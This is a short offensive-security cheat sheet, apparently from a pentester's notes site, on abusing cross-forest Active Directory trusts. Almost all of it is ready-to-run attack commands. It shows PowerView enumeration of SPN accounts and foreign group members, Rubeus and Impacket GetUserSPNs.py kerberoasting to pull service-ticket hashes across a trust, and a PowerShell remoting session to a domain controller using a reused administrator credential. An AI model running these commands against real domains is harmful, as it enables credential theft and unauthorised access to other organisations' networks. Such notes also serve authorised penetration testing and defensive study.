Cross-Forest Trust Abuse

Windows

Cross-Forest Kerberoasting

# Enumerating Accounts for Associated SPNs Using PowerView
Get-DomainUser -SPN -Domain DOMAIN.LOCAL | select SamAccountName

# Enumerating the Account if we find any using above command
Get-DomainUser -Domain DOMAIN.LOCAL -Identity username |select samaccountname,memberof

# Performing a Kerberoasting Attacking with Rubeus Using /domain Flag
.\Rubeus.exe kerberoast /domain:DOMAIN.LOCAL /user:user /nowrap

Admin Password Re-Use & Group Membership

# enumerate groups with users that do not belong to the domain using PowerView
Get-DomainForeignGroupMember -Domain DOMAIN.LOCAL

# Accessing DC Using Enter-PSSession
Enter-PSSession -ComputerName DC03.DOMAIN.LOCAL -Credential DOMAIN\administrator

Linux

Cross-Forest Kerberoasting

# Using GetUserSPNs.py
GetUserSPNs.py -target-domain DOMAIN.LOCAL DOMAIN/user

# getting hash
GetUserSPNs.py -request -target-domain DOMAIN.LOCAL DOMAIN.LOCAL/user

PreviousChild -> Parent Trusts NextSMB, RPC - 137,138,139,445,111

Last updated 2 years ago